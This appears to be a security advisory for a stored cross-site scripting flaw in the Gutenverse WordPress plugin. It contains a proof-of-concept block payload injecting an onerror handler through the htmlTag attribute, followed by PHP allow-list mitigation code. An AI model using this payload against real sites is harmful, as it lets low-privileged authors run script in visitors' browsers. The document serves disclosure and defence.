wpexploit
Dmtirii Ignatyev
WPEX-ID:6F100F85-3A76-44BE-8092-06EB8595B0C9
History: Apr 12, 2024 - 12:00 a.m.

Gutenverse < 1.9.1 - Contributor+ Stored XSS

2024-04-12 00:00:00
Dmtirii Ignatyev
20
Tags: gutenverse, contributor+, stored xss, update

AI Score: 6 Medium
Confidence: High
EPSS: 0.0004 Low
Percentile: 9.1%

Description: The plugin does not validate the htmlTag option in various of its blocks before outputting it back in a page/post where the block is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.

As a contributor, put the code below in a post while in Code Editor mode:

<!-- wp:gutenverse/post-title {"elementId":"guten-sw5SZ2","htmlTag":"img src=x onerror=alert(/XSS-htmlTag/)"} -->
<div class="guten-element guten-post-title guten-sw5SZ2"></div>
<!-- /wp:gutenverse/post-title -->

The XSS will be triggered when any user (pre)views the post.
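The root cause is that a block attribute controlled by a low-privileged author is written into markup as a tag name. The fix that closes this class of bug is to treat htmlTag as an enumerated value, not free text: normalise it, check it against an allow-list of tags the block legitimately needs, and fall back to a default otherwise. The following is an added mitigation example written for this advisory; it is not Gutenverse's own code. The function names (gv_example_*), the default tag, and the allow-list contents are assumptions; only the htmlTag and elementId attribute names and the wrapper classes come from the PoC above. It runs with plain PHP and has no WordPress dependency.

```php
<?php
// Added example, not Gutenverse code: allow-list validation of a block's
// "htmlTag" attribute before it is interpolated into HTML.
// gv_example_* names and the allow-list are hypothetical.

/**
 * Return a safe wrapper tag name. Anything not on the allow-list
 * falls back to $default, so the attribute can never inject markup.
 */
function gv_example_safe_html_tag(string $requested, string $default = 'h2'): string
{
    // Only tag names a post-title block legitimately needs (assumed set).
    static $allowed = ['h1', 'h2', 'h3', 'h4', 'h5', 'h6', 'p', 'div', 'span'];

    // Normalise: lowercase and strip every non-alphanumeric character.
    // Spaces, '=', '(', '/' and quotes from an injected payload all vanish,
    // so the result is either a plain tag name or an unknown token.
    $candidate = strtolower(preg_replace('/[^a-z0-9]/i', '', $requested));

    return in_array($candidate, $allowed, true) ? $candidate : $default;
}

/**
 * Render the block wrapper. The tag name comes from the allow-list;
 * the class value and the visible text are attribute/HTML-escaped separately,
 * because escaping alone cannot make a tag-name position safe.
 */
function gv_example_render_title(array $attrs, string $title): string
{
    $tag   = gv_example_safe_html_tag($attrs['htmlTag'] ?? '', 'h2');
    $id    = htmlspecialchars($attrs['elementId'] ?? '', ENT_QUOTES, 'UTF-8');
    $class = 'guten-element guten-post-title ' . $id;
    $text  = htmlspecialchars($title, ENT_QUOTES, 'UTF-8');

    return "<{$tag} class=\"{$class}\">{$text}</{$tag}>";
}

// Constructed inputs: one benign attribute set and the payload from the advisory.
$benign    = ['elementId' => 'guten-abc123', 'htmlTag' => 'h3'];
$malicious = ['elementId' => 'guten-sw5SZ2',
              'htmlTag'   => 'img src=x onerror=alert(/XSS-htmlTag/)'];

echo gv_example_render_title($benign, 'Post title'), "\n";
echo gv_example_render_title($malicious, 'Post title'), "\n";
```

For the benign input the requested h3 is kept. For the advisory's payload, normalisation reduces the attribute to a single alphanumeric token that is not on the allow-list, so the wrapper is rendered with the default h2 and the injected attributes never reach the output. In a real WordPress plugin the same normalisation step is available as core's tag_escape(), but the allow-list comparison is what actually prevents an arbitrary tag from being chosen.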

